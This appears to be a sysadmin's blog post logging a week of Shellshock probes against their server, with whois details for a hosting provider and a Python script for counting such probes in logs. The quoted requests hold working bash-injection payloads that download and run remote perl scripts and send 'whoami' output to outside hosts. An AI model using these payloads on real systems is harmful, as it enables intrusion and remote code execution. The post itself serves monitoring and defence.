One week of bash exploits

Bananas has other methods to prevent spammy clients from doing stuff, if the traffic is even genuine to begin with, so in the week after the bash exploit no damage was done. Twelve attempts were made by four IP addresses, and I think I found a crap provider as well.

I have sanitized the URLs so they don't become hrefs.

who/country count what attempted
146.71.113.194 us 4 "GET /cgi-bin/helpme HTTP/1.0" "() { :;}; /bin/bash -c \"cd /tmp;wget http:/ /213.5.67.223/jurat;curl -O /tmp/jurat http:// 213.5.67.223/jurat ; perl /tmp/jurat*;rm -rf /tmp/jurat\""
139.192.95.179 id 2 "GET /cgi-bin/hi HTTP/1.1" "() { :;};echo efq2ue25qwneth0s63zh$(curl 'http:// best-home-based-business-idea.com/bash_count.php?%61%6C%61%6E%77%65%73%74%2E%63%6F%6D'; wget -qO- 'http:// best-home-based-business-idea.com/bash_count.php?%61%6C%61%6E%77%65%73%74%2E%63%6F%6D';)efq2ue25qwneth0s63zh"
146.71.111.226 us 3 (7 from provider) "GET /cgi-bin/tell HTTP/1.0" "() { :;}; /bin/bash -c \"cd /var/tmp ; rm -rf j* ; wget http:// 89.33.193.10/ji ; lwp-download http:// 89.33.193.10/ji ; curl -O /var/tmp/ji http:// 89.33.193.10/ji ; perl /var/tmp/ji ; rm -rf *ji;rm -rf jur\""
93.174.93.210 nl 2


Total 12

"GET / HTTP/1.1" "-" "() { :;}; /bin/bash -c \"curl http:// ntontomou.com/custom/ping.php?domain=\\&whoami=`whoami`\""

Our latest iffy neighbourhood is

NetRange:       146.71.96.0 - 146.71.127.255
CIDR:           146.71.96.0/19
OriginAS:       AS53850
NetName:        GSI-146-71-96-0
NetHandle:      NET-146-71-96-0-1
Parent:         NET-146-0-0-0-0
NetType:        Direct Allocation
Comment:        https://support.GorillaServers.com
Comment:        Abuse: abuse@GorillaServers.com
Comment:        Billing: billing@GorillaServers.com
Comment:        Technical Support: support@GorillaServers.com
RegDate:        2014-06-18
Updated:        2014-06-18
Ref:            http://whois.arin.net/rest/net/NET-146-71-96-0-1

OrgName:        GorillaServers, Inc.
OrgId:          GORIL-3
Address:        800 S Hope St
Address:        Suite B100
City:           Los Angeles
StateProv:      CA
PostalCode:     90017
Country:        US
RegDate:        2011-01-28
Updated:        2012-03-12
Ref:            http://whois.arin.net/rest/org/GORIL-3

Nothing ran, but I got a new network block.
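One way to produce this kind of tally from an access log, as an added example rather than code from the original post: it flags any logged field that opens a bash function definition and counts hits per source IP and per /19, the size of the allocation above. The log lines are constructed (combined log format assumed, harmless echo payloads), and `summarize` and `prefix_len` are names chosen here.

```python
import ipaddress
import re
from collections import Counter

# Shellshock trigger: a value that opens a bash function definition.
# Spacing inside "() {" varies between probes, so match it loosely.
SHELLSHOCK = re.compile(r"\(\)\s*\{")

# Assumed combined log format:
# ip ident user [time] "request" status size "referer" "agent"
QUOTED = r'"((?:[^"\\]|\\.)*)"'  # quoted field, allowing \" escapes
LINE = re.compile(
    r"^(\S+) \S+ \S+ \[[^\]]*\] " + QUOTED + r" \d{3} \S+ " + QUOTED + " " + QUOTED
)

def summarize(lines, prefix_len=19):
    """Count Shellshock-style probes per source IP and per enclosing network."""
    by_ip, by_net = Counter(), Counter()
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        # The probe can sit in the request line, the referer or the user agent.
        if not any(SHELLSHOCK.search(field) for field in m.groups()[1:]):
            continue
        try:
            ip = ipaddress.ip_address(m.group(1))
        except ValueError:  # hostname logged instead of an address
            continue
        by_ip[str(ip)] += 1
        by_net[str(ipaddress.ip_network(f"{ip}/{prefix_len}", strict=False))] += 1
    return by_ip, by_net

# Constructed sample lines: addresses and paths as listed in the post,
# timestamps, status codes and payloads made up for the example.
SAMPLE = [
    '146.71.113.194 - - [01/Oct/2014:10:00:00 +0000] "GET /cgi-bin/helpme HTTP/1.0" 404 210 "-" "() { :;}; echo constructed-probe"',
    '146.71.111.226 - - [01/Oct/2014:11:00:00 +0000] "GET /cgi-bin/tell HTTP/1.0" 404 210 "-" "() { :;}; echo constructed-probe"',
    '139.192.95.179 - - [02/Oct/2014:09:30:00 +0000] "GET /cgi-bin/hi HTTP/1.1" 404 210 "() { :;};echo constructed-probe" "-"',
    '192.0.2.10 - - [02/Oct/2014:09:31:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    ips, nets = summarize(SAMPLE)
    for net, hits in nets.most_common():
        print(f"{net:20} {hits}")
    for ip, hits in ips.most_common():
        print(f"  {ip:18} {hits}")
```

Grouping by network is what shows two separate addresses landing in the same provider block.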
